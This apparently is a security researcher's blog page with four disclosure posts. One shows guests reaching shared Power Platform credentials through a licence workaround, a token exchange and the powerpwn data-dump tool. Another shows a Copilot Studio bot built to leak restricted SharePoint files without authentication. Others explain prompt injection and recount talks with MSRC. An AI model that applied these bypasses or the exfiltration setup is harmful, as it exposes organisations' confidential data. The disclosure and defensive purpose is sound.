Recent Posts

All You Need Is Guest

May 04, 2024

This is a long overdue blog version of a talk I gave at BlackHat USA 2023 titled All You Need Is Guest. Slides and video recording are available as well.

Intro

When you get invited as a guest to an EntraID tenant you get restricted deny-by-default access. You shouldn’t have access to any resource not explicitly shared with you, right?

Guest resource access is deny-by-default

Well, no. By the end of this post, you’ll see how guests can find credentials to Azure resources and SQL servers and exploit them to get full data dumps of everything behind them.

PowerPwn finds credentials available for guests to abuse PowerPwn dumps sensitive corporate data

Why invite guests in?

As a small cybersecurity company every enterprise engagement starts the same – how do we share sensitive data back and forth? We don’t want to use email (you’ve never done that, right?).

Sharing sensitive files via email

How do we share resources securely? EntraID external identities – guests – are the mechanism to do that in a safe way.

EntraID external identities

To accomplish that, it needs to satisfy two conditions: It needs to be easy for vendors to onboard and for IT/security to control.

Indeed, it’s super easy to gain access and thus for vendors to onboard. Under default configuration, any user on Teams can just invite a guest in by adding them to a new team. In most enterprises, this is up to individual user choice.

For IT/security the promise is incredible - by inviting guests in you can apply your existing Microsoft security infrastructure to them. Conditional access policies, Intune, the entire Microsoft Security stack.

Microsoft Security suite applies to guests

There is a caveat here though, it is crucial that guests don’t get full access to your tenant otherwise you have just compromised your own controls. Guest access should be deny-by-default.

Guest access must be deny-by-default

Guest accounts in practice

Reality differs. Grab any corporate account, go to make.powerapps.com and click on connections.

Enters Power Apps

You will see enterprise credentials lying around waiting to be leveraged.

Power Apps shared connections

These were overshared due to a simple mistake by a business user. They are available for ANY EntraID account to pick up and use, including guests.

Connections are shared with EVERYONE

These connections are created by business users. Or more precisely, anyone in your organization can just plug in their credentials and create a connection. There are thousands of connectors available for people to use to any enterprise system you can think of. Including on-prem.

Connections created by citizen developers

Exploit

These credentials are not just available for use directly. They are used to give Power Apps or Power Automate access to enterprise resources.

There are a few mechanisms protecting these credentials from a wondering guest (or insider malicious insider, for that matter). Most of the talk was focused on bypassing each and every one of those. Here is a quick overview of each:

Blocked by license

Guests cannot view Power Apps or query connections through Power Apps because they don’t have they right license. While licensing is definitely not a security mechanism, it is somethings used as such nevertheless.

Guests are blocked by license

But wait, what if we get a trial license on our home tenant - the one we control? That should work for the guest tenant, right?

Well, it works! Power Apps validate that you have a license in at least one of the tenant you are part of. Not the specific one you are trying to access.

Blocked by DLP

The main security mechanism for Power Platform is their DLP. Do not get confused, this is not a DLP in the cybersecurity sense. It does not allow labeling of sensitive data not does it provide data leakage controls. Instead, it is an allow/deny list for which connectors can be used. It provides very blunt controls - allowing or blocking entire categories of services like SharePoint or SQL Servers. If you want to get to a more granular level, you need to manage a tight and ever-changing URL list.

It is also VERY easy to bypass.

Nevertheless, it can deny access to connections in case those are blocked in the DLP policy. Here, we have a DLP policy that blocks SQL Server connections.

Access blocked by DLP

At this point, I basically had to wave my hands and ask the audience to allow me to move forward. I will share full details on a subsequent post.

DLP bypass to be disclosed

Say the connection isn’t blocked by DLP then. What now?

Digging into the API calls made by a Power App using a SQL server connection you can spot a call to a service called API Hub. Though those calls, the app makes both read and write operations on top of the SQL server.

Digging into Power Apps API calls Power Apps uses API Hub

API Hub is a service an intermediary service that allows Power Platform apps and users to use shared credentials without actually getting access to the credentials themselves. Instead, API Hub generate a REST API interface for any imaginable operation on the underlying service. Any call to API Hub gets translated to a call to the underlying service using the credentials stored in its internal storage. Those can be user credentials (OAuth refresh tokens), passwords or long-lived secrets. This is how connection sharing works. Sharing a connection in Power Platform means allowing another user to use your credentials which are stored in API Hub.

Blocked by programmatic access to API Hub

Users can’t just generate tokens with the right scope to query API Hub, it is an internal Microsoft resource.

You can’t use a built-in public client app because those need to be pre-approved to query API Hub.

You can’y use your own app because API Hub is an internal resource you cannot grant your apps access to.

A scope away from victory

FOCI to the rescue

At this point, we are stuck.

A bypass recap

We know that these credentials are available for us in the Power Apps UI but we want direct access to API Hub. We can’t generate the right token though.

We know that the Power Apps app can generate tokens to API Hub, but it is a confidential app so we can’t generate tokens on its behalf.

Solving for API Hub scope

Or can we?

Recalling FOCI, we can take a look into the list of know FOCI apps.

FOCI apps

We can generate a token using Azure CLI (of course we can) and exchange that token for a Power Apps token to API Hub! Actually, it turned out you can just ask Azure CLI for a token to API Hub directly.

The fun part

powerpwn is an offensive toolset for M365 focused on Power Platform. It combines the methods above we now have full access to the services behinds those credentials shared in the Power Platform.

It can also install a backdoor that persist even if the user gets deleted, deploy a phishing app on a Microsoft owned domain and more. But that is a story for another day.

Introducing PowerPwn

powerpwn recon -t <tenant_id> finds all of the overshared credentials, apps and automations your user has access to.

powerpwn recon

powerpwn dump -t <tenant_id> goes through each and every one of those and dumps all data from their underlying services. Every SQL server table, every blob in a storage account.

powerpwn dump

You also gain access to a full Swagger UI for each credential that allows you to run arbitrary commands using those credentials (whatever is possible in Power Platform). For SQL Server, you can pass any SQL command to run on the server.

powerpwn playground

I strongly encourage you to play around with it!

Defense

Tactically, use powerpwn. Find and delete these overshared connections. Ideally, do it on a schedule or even automated.

But admittedly this is a tactical patch. We are placing dev-level power in the hands of every enterprise user without guardrails or training. Of course people will make bad judgment calls. Still, share with everyone? That it just too much.

Who owns AppSec for business users?

I strongly suggest using the OWASP LCNC Top 10 to start getting a handle on citizen development.

Tags: , , ,

Security for AI is the Next Big Thing! But we don't really know what it means yet

January 28, 2024

As AI continues to capture everyone’s attention, security for AI becomes a popular topic in the market. Security for AI is capturing the media cycle, AI security startups are going out of stealth left and right, and incumbents scramble to release AI-relevant security features. In our small patch of the world, it is clear security teams are concerned about AI. It seems like the race has begun and we can just about see an AI Security category being formed.

But what does AI Security mean exactly?

The problem with AI capturing mindshare is that everyone finds the way to talk about their existing solution with AI language making it difficult to figure out one solution vs another.

We also frankly don’t really know what security for AI means because we don’t know what AI development means. Security for X typically arrives after X has matured, think cloud, network, web apps, .. but AI remains a moving target.

From my perspective right now, there are three distinct solution categories all claiming to be AI Security solutions. These three solve different problems for different people so I argue that these are fundamental distinctions that would not easily merge, though of course they do have some overlap.

These categories are:

  1. AI DLP
  2. AI Firewall
  3. AI SPM / CNAPP

AI DLP

Fast to gain traction, fast to disappear (I claim).

When ChatGPT was first launched every enterprise I know went down the same route of trying desperately to block it. Every week had new headlines about companies losing their IP to AI because an employee copy-pasted highly confidential data to the chat so they could ask for a summary or a funny poem about it. This was really all anybody could talk about for a few weeks.

Point solutions to address this problem have popped up like mushrooms after heavy rain. Since you couldn’t control ChatGPT itself, and other AIs that started appearing on the consumer market, all of these solutions are different types of proxies. Whether it’s on the network layer, with a host agent or through a browser extension, AI DLP solutions promise to capture rogue users from using unapproved public AI bots and in some cases point users to approved enterprise versions like Azure OpenAI. This problem got so much attention that OpenAI, who caused the scare in the first place, changed their policies so users can now opt-out of being included in the training set and organizations can pay to opt-out on behalf of all their users.

I am bearish about AI DLP. While these solutions were quick to gain traction reacting to public emotions, I don’t see why AI DLP is fundamentally different from a regular DLP or its modern uncle, the CASB. At the end of the day, users copy-pasting sensitive data to a random website on the Internet is an old problem. Not sure why AI makes it different.

Another point about AI DLP is that it can only observe user interaction with AI and completely misses applications that use unapproved AI services.

AI Firewall

Think about SQL injection that prompted the rise of the AST industry. It is an issue with data being translated as instructions, resulting in allowing people who manipulate application data (i.e. users) to manipulate application instruction (i.e. its behavior). With years of severe issues wreaking havoc on poor web applications, application development frameworks have raised up to the challenge and now safely handle user input. If you’re using a modern framework and going through its paved road, SQL injection is for all practical purposes a solved problem.

One of the weird things about AI from an engineer’s perspective is that they mix instructions and data. You tell the AI what you want it to do with text, and then you let your users add some more text into essentially the same input. As you could expect this results in users being able to change the instructions. Using clever prompts lets you do that even if the application builder really tried to prevent it, a problem we all know today as prompt injection.

Some solutions have popped up to try and help application developers avoid prompt injection. They employ a bunch of techniques to do that including threat intelligence (i.e. a list of prompts that work), crowdsourcing and, of course, using AI to flight AI. For an application developer, this typically involves deploying a middleware that acts as a security mechanism between your application and the AI model and fails any injection attempt.

AI models have also improved their inherent resistance to these kinds of attacks, but whether this problem can ever truly be solved remains an open question.

Prompt injection is not the only concern addressed by the AI Firewall category. In fact, some companies have been working on related problems of model theft, model poisoning and model drift for several years now ever since the AI research community discovered adversarial learning. I place these under the same category because they too act as middleware between your application and the AI model, and I doubt people will deploy more than one middleware.

For AI application developers, trying to control these uncontrollable models is a real challenge. This is a security concern, but it is also a predictability and usability concern. Therefore, I believe these concerns are best served as important features of AI application development platforms.

AI SPM / CNAPP

Once you allow AI to act on the user’s behalf and chain those actions one after the other you’ve reached uncharted territory. Can you really tell if the AI is doing things it should be doing to meet its goal? If you could think of and list everything the AI might need to do then you arguably wouldn’t need AI in the first place.

Importantly, this problem is about how AI interacts with the world, and so it is as much about the world as it is about the AI. Most Copilot apps are proud to inherit existing security controls by impersonating users, but are user security controls really all that strict? Can we really count on user-assigned and managed permissions to protect sensitive data from a curious AI?

The problem here is how to build an AI application that interacts with the world in creative ways, but only the creative ways we actually want without any nasty side effects. This category is the least developed, and it is unclear if it’s even one category or if it’s a job for the application development platform or an external security solution. One thing is clear though, the first step is having a deep and precise understanding of the AI application’s environment. Which identities is it using, what components can it run, on which network, and how do they interact with other regular or AI-powered applications.

A finishing thought

Trying to say anything about where AI or by extension AI security will end up is trying to predict the future. We all know the saying, it’s difficult to make predictions, especially about the future. Let’s see how it holds up and where I’ll be most wrong.

Tags:

Copilot exfiltrates High Restricted SharePoint files to any user on the Internet, no auth required

December 03, 2023

Microsoft Copilot Studio allows users to quickly build enterprise Copilots on top of their business data. Every enterprise user can now plug enterprise data into GPT models now and share their bots with the world.

What could go wrong?

Public access to High Restricted SharePoint sites

Data leakage, to name one thing.

Here’s HackerBot. It’s a simple Copilot that allows you to enumerate and download any file for the “HR Compliance” SharePoint site which has a “High Restricted” sensitivity label. To use HackerBot you simply need to navigate to its public URL. No authentication required.

HackerBot leaks High Restricted files to any user on the Internet

If you’d like to play around with it yourself, reach out and I’ll provide a link.

But Microsoft says this is not possible

Microsoft actually identified this scenario and have a big red warning in their Docs saying that this scenario (public user access + Copilot can access SharePoint/OneDrive) is blocked.

"The No authentication and Only for Teams authentication options can't retrieve information from Sharepoint or OneDrive for Business."

So what is going on here?

Analysis and workaround

When you create a new copilot you are prompted to provide a URL which can be a public site, a SharePoint site or a OneDrive directory. If you provide a SharePoint/OneDrive URL Microsoft will publish your bot but indeed suspend it you change the default configuration and switch to authenticated access.

Create Copilot with SharePoint access

Authentication error

This makes sense following the note on Microsoft Docs.

However, it is just one of many ways to provide the copilot with business data access including SharePoint. Those include Topics, Plugins, Skills to name a few.

HackerBot works with Topics. A topic is a particular thing the copilot can do for you, it can be a scripted conversation, access to resources or performing actions on your behalf. Copilot routes users to the right topic by specific trigger words (or a GenAI decision). HackerBot has a “ExfiltrateSharePoint” topic triggered by words like “Exfiltrate”, “SharePoint”, “Data” and “Confidential”.

HackerBot ExfiltrateSharePoint topic

HackerBot ExfiltrateSharePoint trigger words

Topics can be set to use hundreds of connectors that allow access to any business platform you can imagine. If you can’t find your desired platform on the list, you can also trigger a full-blown automation, use a free-style HTTP request or build a custom connector,
If you’re familiar with Power Platform, a topic looks very much like a Power Automate flow (though there’s no 1:1 feature parity).

HackerBot uses a connection to SharePoint to enumerate files on the “HR Compliance” site, and then triggers a flow to retrieve the file’s content base64 encoded.

HacketBot enumerates a High Restricted SharePoint site

HackerBot leaks file content

To allow public access to unauthenticated users, I just left the default setting as is.

Default Copilot Studio authentication settings

That’s it, it’s that simple.

One thing should be bugging you at this point.. if users are not authenticated, how is HackerBot able to fetch data from an enterprise SharePoint site?

Credential Sharing as a Service yet again

The answer is a recurring theme with LCNC platforms and Microsoft Power Platform in particular.

Apps work by user impersonation. When I created HackerBot, I had to provide my credentials as a Copilot maker to run and debug the “ExfiltrateSharePoint” topic. These creds, in this case an OAuth refresh token, are stored by Microsoft and replayed any time a user talks to Copilot.

FAQ

Tenant boundaries (2023-12-04): To clarify, HackerBot can only access SharePoint sites its maker can access. In particular, that means only sites that belong to this maker’s tenant. The issue, however, is that HackerBot users are not authenticated, don’t have relevant permissions and don’t belong to this tenant (or to any tenant, for that matter).

Hacker bot’s maker (2023-12-04): Any user on any tenant can create HackerBot. Licenses are gives automatically. Required permissions (Environment Maker in Power Platform) are assigned by default.

Tags: , , ,

My intense 2am conversation with MSRC a week before BlackHat

September 16, 2023

Research as usual

A couple of months before BlackHat (USA 2023) I got an email from Microsoft Security Response Center. They saw the abstract of my upcoming BlackHat talk and were like, Hi, you’re not planning on dropping any 0days on us are you? Nahh we’re sure you’re not that type of researcher. We must keep our customers safe, you know.

I was expecting this after getting a similar email before my NoCodeMalware talk at defcon last year so I responded casually that they shouldn’t worry, that I won’t be sharing any undisclosed vulns and that I’m happy to share my slides to help them see that. Based on my defcon experience I expected that to be it. Ohh boy, was I wrong.

You see, things are fine and dandy until you’re seen as a threat. Sure, the PR parts of the house might downplay your research and say that its contrived. Heck, they might even plain out say that you’re wrong and misleading. But the technical folks getting those disclosures will continue being friendly and collaborative in parallel. But when you really hit a nerve and they fear you might use it to put them in a bad position, the conversation changes.

Sunlight is the perfect cure

Three weeks before the conference I had the opportunity to discuss my then upcoming talk with Dark Reading’s Ericka Chicokwsky. Ericka was awesome. The conversation went great, we discussed the issues I’m about to discuss, customer’s responsibility in owning their LCNC apps and driving them to action with clear in-your-face-demonstrations like this one. That conversation led to an article. That article found its way to the top slot on Dark Reading. Customers saw it, emails started pouring. Microsoft got pissed.

At this point, the conversation with MSRC has been slowly moving forward in the background. I gave them got early access to powerpwn, I shared the agenda and promised to share slides once I have a draft ready. I did have a few open vuln disclosures at the MSRC portal waiting for a review with no apparent urgency, and was waiting on a verdict to see if they could be part of the talk. Tbh, based on my previous experience reporting logical type of bugs to the Power Platform team and getting them rejected as by-design, I didn’t expect any difference here. Others have had a similar experience.

That kind of researcher

But the DR article has completely changed the conversation. Pretty soon, I was dealing with an entire group of folks across MSRC and the Power Platform team. It was clear my case got escalated and I was now considered that kind of researcher. What followed was an intense week where the team and I were having difficult conversations for a few hours every day (Or mostly night given the time difference). The conversation were also very nice and polite, and both MSRC and I made sure to clarify that we appreciate each other’s work. But we did exchange some strong messages. At the end of the day it was about trust (isn’t it always?). They didn’t trust me to not drop 0days and put customers at risk. I didn’t trust them to fix the issues without overwhelming public pressure.

I thought they were trying to get me to pull the talk. I feared they would use their corporate magic powers to make it go away along with hours of hard work. They never said anything about legal action, but they didn’t have to for it to be there in my head. I thought about the negative impact on our company and its employees which works closely with large Microsoft shops. I thought about the negative impact to my own credibility.

At this point I also started doubting myself. I was doing this to help shed light over a risk that’s already being exploited in the wild. To push customers and Microsoft to take responsibility and drive action. Or was I just telling that to myself to justify boosting my own ego? I am well aware that security research is a double edged sword, and that what I was about to reveal to the community could be used for good and bad. Was I doing everything I can to make sure the outcomes are positive for the industry? Talking to the company lawyer who basically told me that I should pull the talk proactively to protect my company didn’t help either (note: at this point, I should have gone to the amazing folks at EFF. So I reached out to some security friends which I absolutely trust and asked for their take on things. I wanted to know what they would have done. I wanted them to tell me the hard truth.

They did, the hard truth was that I was absolutely fine and doing the right thing. They also helped me navigate the sharp edge I had to travel through. How do I push forward shedding light over this issue in the most responsible way that leaves everyone better for it afterwards. I came off these discussions with a strong sense of purpose and confidence in my path forward. Thank you, you know who you are.

Look, this is not what I wanted to be doing a week before the conference. I had a full backlog of finishing off my presentation, making final touches to powerpwn and prepping for meetings. But most of all, I mostly wanted to have some off time with my family before I disappear for a week.

At this point, I would like to acknowledge the amazing folks I got to meet at Microsoft during these difficult conversations. While I am critical at Microsoft as an organization, I have nothing but respect for the MSRC and Power Platform folks who handled my case. This could have been a very bad experience, but it wasn’t. I wouldn’t say it was stress-free, but the team was professional, respectful, clear and absolutely wanted to find a win-win, and for that I thank them.

Back to normal

After several hours of video calling, we got to the crux of it. From their side, they were worried I was going to drop a 0day DLP bypass vuln which I had reported and they were now fixing (More on that coming soon). From my side, I wanted to hold them accountable to my open reports, and for them to publicly acknowledge that recent Power Automate Desktop improvements were a direct result of my defcon research. Last year they downplayed the issue, took more than 6 months to (partially) fix it and didn’t provide any acknowledgement. Once we both understood what the other is is really hurting about, fixing these was easy. I promised I would not expose any technical details about the vuln and coordinated the messaging around that with them, and they made an effort to acknowledge my research and provided clarity on existing reports. Once this was done, you could just feel the change in atmosphere. We were no longer in crisis mode, we were building a collaboration.

After the talk, TheRegister’s Brandon Vigliarolo published an amazing deep dive into the issues I’ve uncovered and what they mean to Microsoft customers. I’m sure they found it difficult to read. But this time, there was no PR response downplaying the issue.

That same evening I had the opportunity to meet in person some of the Microsoft team members I’ve been video calling with, alongside other folks at Microsoft security organization. Those conversations were absolutely positive. I felt a sincere attempt to do good together. I even got to laugh around with members of a team that was actively working on reacting to the research I’ve just shared, I.e. people who’s weekend I’ve just ruined, who were awesome about it.

The aftermath

The reaction to my talks has been overwhelming. Other hackers and researchers have been really supportive and were asking about what comes next. Security engineers and architects at large Microsoft shops asked for practical advice and tooling. The reaction in social media as been positive. Thank you everyone.

I’m mostly happy after learning of several huge organizations that are now going through a complete overhaul of their guest strategy and their LCNC initiatives. The combined impact of the talks, the powerpwn tool and the community reaction created urgency and buy-in which security leaders across the industry are now using to go and fix problems that require heavy lifting. As we all know, big changes are always put on perpetual snooze until something makes them urgent. This is now urgent, which means we now have a window to go ahead and make things better. That is the outcome I was hoping for.

Tags: , ,